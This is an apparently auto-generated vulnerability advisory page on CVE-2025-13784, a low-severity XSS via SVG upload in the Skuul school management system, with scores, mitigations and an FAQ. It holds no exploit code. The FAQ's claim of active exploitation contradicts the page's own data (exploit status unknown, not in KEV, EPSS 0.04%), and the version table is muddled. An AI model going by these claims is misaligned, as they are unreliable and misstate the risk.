免费扫描
LOWCVE-2025-13784CVSS 2.4

yungifez Skuul 学校管理系统存在通过 SVG 漏洞的 XSS 漏洞

平台

php

组件

yungifez/skuul

修复版本

2.6.1

2.6.2

2.6.3

2.6.4

2.6.5

2.6.6

2.6.6

AI Confidence: highNVDEPSS 0.0%已审阅: 2026年5月
在NVD查看
保存
正在翻译为您的语言…

A cross-site scripting (XSS) vulnerability has been identified in yungifez Skuul School Management System versions up to 2.6.5. This flaw resides within the SVG File Handler component, specifically affecting the /dashboard/schools/1/edit file. Successful exploitation allows an attacker to inject malicious scripts, potentially compromising user sessions and system integrity. A fix is available in version 2.6.6.

影响与攻击场景翻译中…

This XSS vulnerability allows an attacker to inject arbitrary JavaScript code into the Skuul School Management System. An attacker could leverage this to steal user credentials, redirect users to malicious websites, or deface the application. The vulnerability's location within the /dashboard/schools/1/edit page suggests that administrators are particularly at risk, as they often have elevated privileges within the system. Given the public availability of an exploit, rapid exploitation is likely. The impact could extend beyond the immediate application, potentially affecting any systems accessible through compromised administrator accounts.

利用背景翻译中…

This vulnerability has been publicly disclosed and an exploit is available, indicating a high likelihood of exploitation. The CVE was published on 2025-11-30. The vendor has not responded to early disclosure attempts. The CVSS score of 2.4 (LOW) reflects the relatively limited impact and ease of exploitation, but the public exploit significantly increases the risk.

哪些人处于风险中翻译中…

Schools and educational institutions using yungifez Skuul School Management System, particularly those running versions prior to 2.6.6, are at risk. Administrators of the system are at higher risk due to their elevated privileges and frequent access to the /dashboard/schools/1/edit page. Shared hosting environments where multiple users share the same server instance are also vulnerable.

检测步骤翻译中…

• php / web:

curl -I https://example.com/dashboard/schools/1/edit | grep -i 'X-XSS-Protection'

• php / web: Examine the /dashboard/schools/1/edit file for any unsanitized user input that is directly outputted to the page. • generic web: Monitor access logs for unusual requests targeting /dashboard/schools/1/edit with suspicious parameters. • generic web: Check response headers for unexpected JavaScript code or redirects.

攻击时间线

  1. Disclosure

    disclosure

  2. PoC

    poc

威胁情报

漏洞利用状态

概念验证未知
CISA KEVNO
互联网暴露

EPSS

0.04% (13% 百分位)

CISA SSVC

利用情况poc
可自动化no
技术影响partial

CVSS 向量

威胁情报· CVSS 3.1CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N2.4LOWAttack VectorNetwork攻击者如何到达目标Attack ComplexityLow利用漏洞所需的条件Privileges RequiredHigh攻击所需的认证级别User InteractionRequired是否需要受害者采取行动ScopeUnchanged超出受影响组件的影响范围ConfidentialityNone敏感数据泄露风险IntegrityLow数据未授权篡改风险AvailabilityNone服务中断风险nextguardhq.com · CVSS v3.1 基础分数
这些指标意味着什么?
Attack Vector
网络 — 可通过互联网远程利用,无需物理或本地访问。攻击面最大。
Attack Complexity
低 — 无需特殊条件,可以稳定地利用漏洞。
Privileges Required
高 — 需要管理员或特权账户。
User Interaction
需要 — 受害者必须打开文件、点击链接或访问特制页面。
Scope
未改变 — 影响仅限于脆弱组件本身。
Confidentiality
无 — 无机密性影响。
Integrity
低 — 攻击者可修改部分数据,影响有限。
Availability
无 — 无可用性影响。

受影响的软件

组件yungifez/skuul
供应商osv
影响范围修复版本
2.6.0 – 2.6.02.6.1
2.6.1 – 2.6.12.6.2
2.6.2 – 2.6.22.6.3
2.6.3 – 2.6.32.6.4
2.6.4 – 2.6.42.6.5
2.6.5 – 2.6.52.6.6
2.6.52.6.6

软件包信息

最后更新
V2.6.49个月前

弱点分类 (CWE)

CWE-79CWE-94

时间线

  1. 已保留
  2. 发布日期
  3. 修改日期
  4. EPSS 更新日期

缓解措施和替代方案翻译中…

The primary mitigation for CVE-2025-13784 is to upgrade to version 2.6.6 or later. If upgrading is not immediately feasible, consider implementing input validation and output encoding on user-supplied data within the /dashboard/schools/1/edit page. Web application firewalls (WAFs) configured to detect and block XSS payloads can provide an additional layer of defense. Regularly review and sanitize any SVG files uploaded to the system to prevent malicious code injection.

修复方法

升级到已修补的版本或应用供应商提供的缓解措施(如果存在)。由于供应商未响应,建议分析易受攻击的代码并手动应用补丁,以避免执行不需要的脚本。验证和清理 SVG 文件输入对于防止 XSS 攻击至关重要。

CVE 安全通讯

漏洞分析和关键警报直接发送到您的邮箱。

常见问题翻译中…

What is CVE-2025-13784 — XSS in yungifez Skuul School Management System?

CVE-2025-13784 is a cross-site scripting (XSS) vulnerability affecting yungifez Skuul School Management System versions up to 2.6.5, allowing attackers to inject malicious scripts.

Am I affected by CVE-2025-13784 in yungifez Skuul School Management System?

You are affected if you are using yungifez Skuul School Management System versions 2.6.5 or earlier. Upgrade to 2.6.6 or later to mitigate the risk.

How do I fix CVE-2025-13784 in yungifez Skuul School Management System?

The recommended fix is to upgrade to version 2.6.6 or later. Implement input validation and output encoding as a temporary workaround.

Is CVE-2025-13784 being actively exploited?

Yes, a public exploit is available, indicating a high probability of active exploitation.

Where can I find the official yungifez advisory for CVE-2025-13784?

The vendor has not responded to early disclosure attempts. Check the yungifez website and GitHub repository for updates.

你的项目受影响吗?

上传你的依赖文件,立即了解此CVE和其他CVE是否影响你。

免费扫描搜索 CVE